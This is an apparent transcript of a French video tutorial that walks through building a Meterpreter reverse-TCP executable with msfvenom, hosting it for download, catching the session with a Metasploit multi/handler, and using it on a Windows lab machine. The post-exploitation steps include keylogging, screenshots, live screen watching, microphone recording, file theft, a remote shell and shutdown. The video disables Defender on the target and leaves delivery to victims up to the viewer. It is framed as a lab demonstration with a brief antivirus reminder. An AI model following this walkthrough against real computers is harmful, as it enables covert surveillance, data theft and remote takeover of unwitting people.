Bonsoir et bienvenue dans cette vidéo. Donc aujourd'hui nous allons voir comment prendre le contrôle d'un PC distant à l'aide de MSF Venom et de Metasploit. D'abord, c'est quoi MSF Venom? Donc MSF Venom est un outil utilisé dans le cadre du projet Metasploit qui permet de gérer des payloads pour des tests de pénétration. Il combine les fonctionnalités de génération de payloads et d'encodage, remplaçant les anciens outils MSF Payload et MSF Encode depuis le 8 juin 2015. Donc, cet outil est essentiel pour les hackers et les professionnels de la sécurité car il facilite la création de shellcode dans divers formats, ce qui est crucial pour échapper au système de détection d'intrusion et le logiciel antivirus. Donc ici, la syntaxe de MSF Venom est assez simple. Donc il suffit de taper la commande -ep pour spécifier le type de payload qu'on veut. Donc si on veut un payload de type Windows, Linux ou bien macOS, Android, etc. Ou bien un payload de type PHP, donc Ruby, Python, etc., etc. Donc ensuite on va spécifier ici les LOS, c'est-à-dire l'adresse IP de notre machine, leur port pour le port d'écoute. Donc là on met le port qu'on veut et -F le format. Donc si on veut un fichier exécutable ou bien un fichier RAW, etc., etc. Maintenant -O, on va rediriger la sortie vers un fichier qu'on va nous-mêmes choisir. Donc on va choisir le nom du fichier, quoi. Donc c'est ça la syntaxe de MSF Venom. Donc MSF Venom est un outil puissant utilisé pour gérer des payloads pour différentes plateformes et systèmes d'exploitation. Donc les plateformes qui prennent en compte MSF Venom, donc on va voir ça au niveau de la phase pratique. Donc nous allons lister donc les plateformes que MSF Venom prend en compte. Donc pour ces plateformes-là, on pourra donc créer des payloads avec, si on choisit donc une plateforme, par exemple Windows, si on prend Windows par exemple, donc on peut voir l'ensemble des payloads Windows qui peuvent être créés. Donc pour cela, il faudra taper la commande MSF Venom-list payload. Donc on va voir ça au niveau de la phase pratique. Donc ensuite, après la création du payload, donc il faudra donc lancer l'écoute. Donc, pour lancer l'écoute avec Metasploit, donc il y a deux techniques. Donc, la première technique consiste à lancer d'abord Metasploit, ensuite exécuter ces commandes-là. Donc, on met use exploit multi-handler, set payload pour spécifier le type de payload qu'on a utilisé lors de la création. Ensuite, set LOS pour mettre la DCP, set LPort pour mettre le port. Donc, le port d'écoute qu'on avait spécifié. La deuxième technique, c'est de lancer tout avec une seule ligne de commande. Donc là, on ne va pas démarrer d'abord Metasploit pour ensuite exécuter ces commandes-là, mais on va mettre ça sur une seule ligne de commande. Donc, on va mettre juste MSF console -Q -X, donc suivi de use exploit multi-handler. Ensuite, on va spécifier le type de payload qu'on a utilisé lors de la création, cette LHOST, l'adresse IP, cette LPort, le port d'écoute, et là, on va terminer avec un exploit. Si on lance cette commande-là, donc l'écoute va se lancer automatiquement. On va basculer sur Kali. Donc la première chose à vérifier, donc c'est de voir donc la liste des plateformes. Donc MSF Venom prend en compte. Donc pour cela, on met MSF Venom -liste espace plateforme. Donc on met entrée. Donc ici vous voyez donc l'ensemble des plateformes que MSF Venom prend en compte. Donc on a Android ici, Cisco, donc il y a du Java aussi, Linux, il y a du Linux, il y a Mac OS X aussi, PHP, Python, il y a Ruby aussi, Solaris et Windows. Donc ici, la plateforme donc, qui nous intéresse aujourd'hui, c'est Windows. On va prendre le contrôle d'une machine Windows, quoi. Donc pour cela, donc, on va voir les payloads Windows. Donc ce qui nous intéresse, donc ce sont les payloads de type meter-preter, quoi. Si je lance la commande MSF Venom-list payload, donc là j'aurai l'ensemble des payloads. Mais si je filtre sur Windows, donc j'aurai l'ensemble des payloads Windows. Donc vous allez avoir des payloads de type meter-preter et des payloads de type reversal. Donc ce qui nous intéresse, ce sont les payloads de type meter-preter. Donc on va filtrer aussi sur les payloads de type meter-preter. Donc on met MSF Venom-list payload. Donc là on va filtrer sur les payloads de type Windows meter-preter. Donc on met un grep, espace ici, grep Windows meter-preter. Donc si je mets entrée, donc là on aura l'ensemble des payloads de type Windows meter-preter. Donc ce sont des payloads donc qui nécessitent donc
que l'écoute soit lancée avec Metasploit. Donc, si par exemple, je crée un payload de type Windows Meterpreter et que je lance l'écoute avec Netcat, donc là, je n'aurai pas de session. Donc, une fois le payload exécuté sur la cible, je n'aurai pas de session. Donc, ici, vous voyez qu'on a énormément de payloads aussi, de type Windows Meterpreter. Donc, ce qui nous intéresse, c'est le payload de type Windows Meterpreter Reverse TCP. Donc, on va aller le chercher. Donc, c'est ce payload-là qui nous intéresse. Donc, Windows Meterpreter Reverse TCP. Donc, on va le copier. Donc, on va essayer de générer ce payload. Donc, on met MSF Venom -P. Donc, pour spécifier le payload, donc je mets un Shift Insert pour insérer le payload copié tout à l'heure. Espace, je vais mettre l'adresse IP de ma machine Kali. Donc, je vais aller chercher l'IP de la machine. Donc, j'ouvre notre terminal avec CTRL-SHIFT-T. Ensuite, je tape la commande IPA pour voir l'IP de ma machine. Donc, l'IP, c'est 192.168.106.137. Maintenant, c'est ça que je vais spécifier ici. Lhost, je mets égal 192.168.106.137. OK. Maintenant, le port. Donc, je vais mettre un port d'écoute. Je mets le port que je veux. Donc, je mets 4444 par exemple. Donc, ensuite, on met -F. Donc, pour spécifier le type de fichier qu'on veut. Donc, on veut fichier exécutable. Donc, on met ex. Ensuite, je mets -O pour rediriger la sortie vers un fichier. .exe. Donc là, si je lance la commande, automatiquement mon payload sera créé. Je mets Entrée. Donc c'est bon. Donc vous voyez que le payload est créé ici. On a la taille aussi du payload. Donc si je mets ls, donc vous voyez, on a le payload ici, hakamet.exe. Ce qui reste à faire ici, donc comme vous avez votre payload créé, donc ce qui reste à faire, c'est de le faire parvenir à votre cible. Donc, ce que je vais faire ici, comme je suis dans un environnement de test et que la machine cible aussi est ma machine, donc c'est une machine virtualisée, donc une machine Windows. Donc, je vais lancer donc un serveur web ici sur ce dossier. Comme ça, je pourrai récupérer donc ce fichier sur la machine distante, donc la machine de la victime, quoi. Donc, pour cela, je vais taper la commande Python -m, donc http serveur. Ensuite, je vais spécifier le port, je mets 80 et je vais entrer. Donc ici, donc le serveur est lancé sur le port 80. Je vais aller sur la cible, essayer de récupérer donc le fichier hakamet.exe et ainsi pouvoir l'exécuter pour pouvoir donc récupérer une session sur la machine Windows. Donc, mais avant ça, je vais lancer l'écoute. Donc, comme je vous ai montré tout à l'heure, pour lancer l'écoute, il y a deux façons de le faire. Pour la première méthode, donc il faut lancer Metasploit, ensuite exécuter l'écoute avec le multi-handler en spécifiant l'adresse IP, le payload, le port et ensuite la commande exploit, quoi. La deuxième méthode consiste à mettre tout ça sur une seule ligne de commande et ainsi lancer l'écoute. Donc, je vais vous montrer les deux méthodes. Donc, d'abord, on va lancer MSF console, on lance Metasploit pour la première méthode. Donc là, c'est bon. Donc, on va lancer l'écoute en tapant la commande use exploit multi-handler. Je mets Entrée. Ensuite, je vais spécifier le type de payload. Je mets set payload. Donc, je peux aller copier le payload. Comme ça, ce sera beaucoup plus facile. Donc, clic droit. On va coller avec Shift Insert. Ensuite, je mets Entrée. Je vais spécifier les hosts, donc l'IP de ma machine. La machine Kali 192.168.106.137. Ensuite, je vais spécifier le port. Donc, le port que j'ai utilisé lors de la création du payload, c'était le 4444. Ensuite, je vais taper la commande exploit pour lancer l'écoute. Maintenant, l'écoute est lancée. Donc, il attend une connexion, quoi. Donc, comme j'ai lancé déjà le serveur ici, donc sur ce dossier, donc je pourrais sur la machine cible récupérer le fichier hakamet.exe. Donc, je vais aller sur la machine Windows. Donc, une fois sur la machine Windows, je vais lancer un navigateur. Ici, je vais mettre l'IP de ma machine Kali. Donc, puisque le serveur web est déjà lancé, donc sur le port 8080. Donc, je mets 8080 et je mets Entrée.
Donc ici, vous voyez, je suis sur le dossier où est lancé donc le serveur. Donc l'ensemble des fichiers qui se trouvent sur ce dossier-là, je pourrais les voir ici. Donc ici, ce sont, si vous voyez un point suivi du nom de fichier, donc ce sont les fichiers qui sont cachés, quoi. Donc là, si je mets ls, si je reviens ici sur ce dossier, donc je suis sur ce dossier, si je mets ls, je ne vais pas voir ces fichiers-là parce que ce sont des fichiers cachés. Mais si je mets ls-la, donc vous allez voir l'ensemble des fichiers, quoi, ici. Les fichiers qui ont point et les dossiers qui ont point, ce sont les dossiers et les fichiers qui sont cachés. Donc avec un ls, on ne peut pas les voir. Donc il faut faire un ls-la pour voir les fichiers et les dossiers cachés. Donc c'est bon. Donc je vais revenir ici. Donc comme je suis sur le dossier, je vais aller chercher le fichier hakamet.exe, donc que j'ai créé tout à l'heure. Mais ici la condition est que il faut avoir la protection antivirale qui est désactivée ou bien qui est obsolète pour que cela marche. Donc pour cela, donc, comme je suis dans un environnement de test, je vais désactiver la protection antivirale pour pouvoir réussir cette partie. Donc je mets ici au niveau de la barre de recherche Defender, donc je vais aller désactiver donc la protection antivirale. Je clique sur paramètres ici, donc la protection en temps réel, on va le désactiver. Donc c'est bon. Là, je pourrais récupérer le fichier hakamet.exe. Donc il suffit de cliquer juste sur le fichier ici. Donc, je vais cliquer sur le fichier pour le récupérer. Donc si je vais au niveau de téléchargement, donc voici le fichier hakamet.exe. Maintenant, comme l'écoute est lancée ici, donc vous voyez que je suis en écoute ici, donc je peux exécuter le payload. Donc si je double-clique sur le payload, donc je vais cliquer sur exécuter quand même. Donc là, normalement, je récupère donc une session interpréteur sur la cible. Voici ici donc la session. Donc ici, j'ai interpréteur session 1 open it. Donc là, je suis sur la machine cible. Donc avant de continuer, donc je vais vous montrer l'autre technique qui est beaucoup plus simple. Donc pour avoir un shell, donc c'est de lancer donc l'écoute avec une seule ligne de commande. Donc avant de continuer, quoi, donc après on va voir les techniques les commandes post-exploitation qu'on peut exécuter sur la cible. Ce qu'on peut faire sur la cible, quoi. Donc c'est ça qu'on va voir après. Donc là, je vais quitter. Quitte. Donc, je vais lancer l'écoute avec une seule ligne de commande. Donc c'est la technique que je vous ai montré tout à l'heure. Donc c'est beaucoup plus simple, quoi. Donc je mets MSF console -q-x. Donc je mets un code, donc je mets use exploit multi-handler. Donc point virgule, je mets certes, je spécifie le payload, donc je mets payload, donc c'est du Windows Interpreter Reverse TCP. Donc c'est le type de payload qu'on a utilisé lors de la création du fichier hakamet.exe. Donc je mets reverse TCP. D'accord, on met set. Ensuite, set host ici. Donc, je vais mettre l'IP de la machine Kali 192.168.106.137. Donc, c'était le port. Donc, je vais mettre le port d'écoute. Donc, c'était 4444. Le port est spécifié lors de la création. Ensuite, là, je vais mettre un exploit pour exécuter. Donc, là, je ferme et c'est bon. Je peux lancer l'écoute. Donc, on patiente d'abord que l'écoute se lance. Ensuite, on va refaire la même procédure. Donc, on va aller sur la machine cible et exécuter le fichier hakamet.exe pour pouvoir ainsi récupérer une session interpréteur sur la cible. Donc là, c'est bon, l'écoute est lancée. Donc, vous voyez que ma machine est en écoute ici sur le port 4444. Donc, je reviens sur la machine Windows. Ensuite, je vais double-cliquer sur le fichier hakamet.exe. Donc, je reviens sur Linux. Donc, vous voyez que je récupère encore une session interpréteur sur la machine Windows. Donc, à partir de là, je vais voir l'ensemble des commandes que je peux exécuter. Pour voir ça, il faut taper la commande help. Donc, ici, on a l'ensemble des commandes qu'on peut exécuter sur la machine cible. Donc, on va voir quelques-unes de ces commandes, ce qu'on peut faire donc, en post-compromission. Donc, comme on a la main sur la machine cible, on va voir ce qu'on peut faire.
Donc, la première commande exécutée, donc c'est la commande qui nous permet d'avoir donc les informations sur la machine cible. Donc, pour cela, je vais taper la commande sysinfo, je mets entrée. Donc ici, le nom de la machine, c'est Hakamed PC2. Donc, le système d'exploitation, c'est du Windows. Ici, donc Windows 10. Donc, la version, c'est le 10240. Ensuite, la structure, c'est du 64 bits. Ensuite, on peut voir avec quel utilisateur on est arrivé sur la machine. On tape la commande getUID. Donc, je vois, ici, je suis connecté en tant que Ahmed. Donc, Hak-Ahmed, quoi. Ce qu'on va faire, c'est qu'on va prendre une capture d'écran sur la cible avec la commande screenshot. Donc, on va capturer l'écran de la cible. Ensuite, pour l'ouvrir, donc je vais ouvrir un navigateur. Ça sera beaucoup plus facile. Donc là, on lance. Donc ici, vous voyez, c'est l'écran de la cible, quoi. Donc c'est ça qui est ouvert au niveau de la machine Windows 10. Donc on peut vérifier. Donc vous voyez, c'est ça qui est ouvert sur la machine Windows 10. Donc ensuite, on fait quelle commande? Donc on va faire du keylogin. Ensuite, donc on va essayer de récupérer donc les frappes de clavier sur la cible. Ce que notre cible tape, quoi, sur son clavier, on va essayer de récupérer ça. Donc pour cela, il faut taper la commande ici, keyscan, donc start. Je mets entrée. Donc je reviens sur la machine cible ici. Donc je vais ouvrir un fichier, le fichier sécurité ici. Je vais essayer de taper quelque chose. Donc je suis Ahmed par exemple. Je reviens sur la machine attaquante et là je vais taper la commande keyscan donc dump. Donc keyscan dump pour afficher donc les frappes de clavier tapées sur la machine cible. Donc si je mets entrée, donc vous avez vu là j'ai pu récupérer ce que la victime a tapé, quoi. Donc ici vous voyez je suis Ahmed. Donc on a pu récupérer ça. Il y a aussi la commande upload donc qui nous permet donc d'uploader, donc d'envoyer des fichiers sur la machine, donc la machine compromise. Il y a aussi la commande download qui nous permet d'en récupérer aussi sur la machine distante. Donc je vais me mettre sur le bureau de la machine distante. Donc je vais essayer de récupérer donc un fichier security qui est sur le bureau. Je vais d'abord voir là où je me trouve. Je mets pwd, donc je suis sur download. Donc je vais reculer d'un cran et je vais me déplacer sur desktop. Donc là c'est bon. Si je mets ls ou bien dir, les deux commandes marchent. Si je mets dir aussi, ça marche. Donc on a ici deux fichiers ici, desktop.ini et security.txt. Je vais essayer de récupérer le fichier security.txt avec la commande download suivi du fichier security.txt. Donc là j'ai pu récupérer le fichier. Le fichier se trouve sur home Kali. Donc je vais aller voir ça. Je mets pwd, là je suis sur home Kali. Donc si je liste, normalement j'ai le fichier security, je mets ls, donc j'ai le fichier security.txt. Maintenant pour afficher le contenu du fichier carte de security.txt, je mets entrée. Donc ici vous voyez le contenu du fichier security.txt. Donc cette commande nous permet de télécharger des fichiers qui se trouvent sur la cible. Donc l'autre commande qu'on peut faire, on peut enregistrer donc le micro de la cible. Donc pour cela il suffit de taper la commande record mic. Maintenant on va mettre -d pour lui spécifier le nombre de secondes qu'on veut enregistrer. Donc je vais enregistrer 10 secondes, je mets 10. Je mets entrée. Donc on va enregistrer donc pendant 10 secondes donc la victime, quoi, on va l'enregistrer pendant 10 secondes. Donc tout ce qu'il dit donc sera enregistré pendant 10 secondes. Donc vous voyez c'est terminé. Donc le fichier se trouve aussi sur home Kali. On va essayer d'écouter donc ce qu'on a enregistré pour voir si ça a récupéré du son. Donc on va aller sur home Kali, donc open folder. Donc là je suis sur Kali, donc c'est ici, quoi. Donc voici le fichier, donc je peux double-cliquer sur le fichier. Donc voici l'enregistrement. Donc on a pu récupérer ce que disait la victime lors de l'enregistrement. Maintenant on peut aussi donc voir en temps réel ce que la victime fait. Donc pour cela il va taper la commande screenshot au lieu de screenshot. Donc ça on aura donc vous voyez, en temps réel, on a ce que la victime fait. Tout ce qu'il fait en temps réel, on peut le voir. Donc je reviens sur la machine cible ici. Donc si je ferme ici,
enregistrer. Donc vous allez voir que ici aussi, voilà, ici. Donc je récupère en temps réel ce qu'il fait, quoi. C'est comme un bureau à distance, sauf que là je ne peux pas interagir, donc je ne peux rien faire. Ce que je peux, c'est juste observer ce qu'il fait, mais je n'ai pas la main, quoi, pour pouvoir exécuter des commandes ou bien ouvrir des fichiers. Donc voyez un peu comment c'est dangereux. Je peux avoir un cell CMD. Donc pour cela, il faut taper la commande cell. Donc ici, je suis sur le CMD de la machine victime. Donc si je mets ipconfig, donc vous allez voir que je récupère donc l'adresse IP de la machine cible. Donc vous allez voir que je suis sur la machine cible. Son IP est 192.168.106.135. Donc je vais quitter ici, je mets exit. Donc je reviens sur ma section interpréteur ici. Donc si vous tapez la commande help, donc l'ensemble des commandes que vous pouvez exécuter sont présentes ici. Donc j'en ai pris quelques-unes pour vous montrer donc comment c'est dangereux donc d'exécuter n'importe quel fichier que vous voyez. Donc ici avec un simple fichier .exe, donc j'ai pu donc avoir la main sur la cible et vous voyez un peu tout ce que je vous ai montré comme commande. Donc la dernière commande qu'on va exécuter, c'est d'éteindre la machine cible. Pour cela, je vais taper la commande juste shutdown, quoi. Et là, si on revient sur la machine cible, vous allez voir que la machine est en train de s'éteindre. Donc voilà, c'était ça la vidéo. Donc vous voyez un peu comment j'ai pu prendre le contrôle d'un PC à distance. Donc ici, donc ce qu'il faut retenir, c'est qu'il faut toujours garder votre antivirus à jour. Donc sinon vous êtes exposé à ces types d'attaques. Donc ici j'ai pas fait grand chose, donc j'ai juste créé donc un payload.exe avec MSF Venom. Donc je l'ai fait parvenir à ma cible. Donc ça sera à vous de voir donc les techniques que vous pouvez utiliser pour faire parvenir ça à votre cible. Donc ensuite j'ai lancé mon écoute sur Metasploit. Donc je vous ai montré les deux techniques. Donc soit on lance d'abord Metasploit, on va lancer l'écoute là-bas, ou bien on lance ça sur une seule ligne de commande. Donc c'était la deuxième méthode. Ensuite on attend que la cible exécute donc le fichier .exe. Une fois le fichier .exe exécuté, donc j'ai pu récupérer donc une session interpréteur sur la cible. Donc à partir de là, on peut taper la commande help comme je vous ai montré tout à l'heure. On aura la liste des commandes qu'on peut exécuter donc sur la cible, quoi. Donc il y a des commandes aussi qui ne marcheront pas, donc si vous les testez, comme la commande webcam list, donc ça ne marchera pas parce que je suis dans un environnement virtualisé, donc ma machine est une machine virtuelle, donc vous n'aurez pas de webcam. Donc il y a aussi une autre commande qui ne marchera pas, qui est la commande hashdump, donc qui permet de dumper les fichiers SAM et de récupérer l'ensemble des hashes, donc des utilisateurs qui sont créés sur la machine victime. Donc c'est une commande qui ne marchera pas parce que c'est une commande qui nécessite donc le privilège administrateur pour marcher. Donc là on n'était pas connecté en tant qu'administrateur, mais plutôt en tant que HackAhmed. Il y a des techniques qui nous permettent donc de bypasser l'IAC, donc pour devenir donc administrateur ou autorité intersystème sur la machine cible. C'est le niveau de privilège le plus haut sur Windows. Donc ça, on va faire des vidéos spéciales là-dessus, comment on peut le faire avec Windows 7, avec Windows 8 et avec Windows 10. Donc c'était ça la vidéo. Donc prochainement, donc on va essayer de voir donc les chevaux de Troie. Donc c'est quoi un cheval de Troie, et on va essayer de créer un cheval de Troie. Donc c'était ça la vidéo. Donc je vous donne rendez-vous prochainement et d'ici là, portez-vous bien.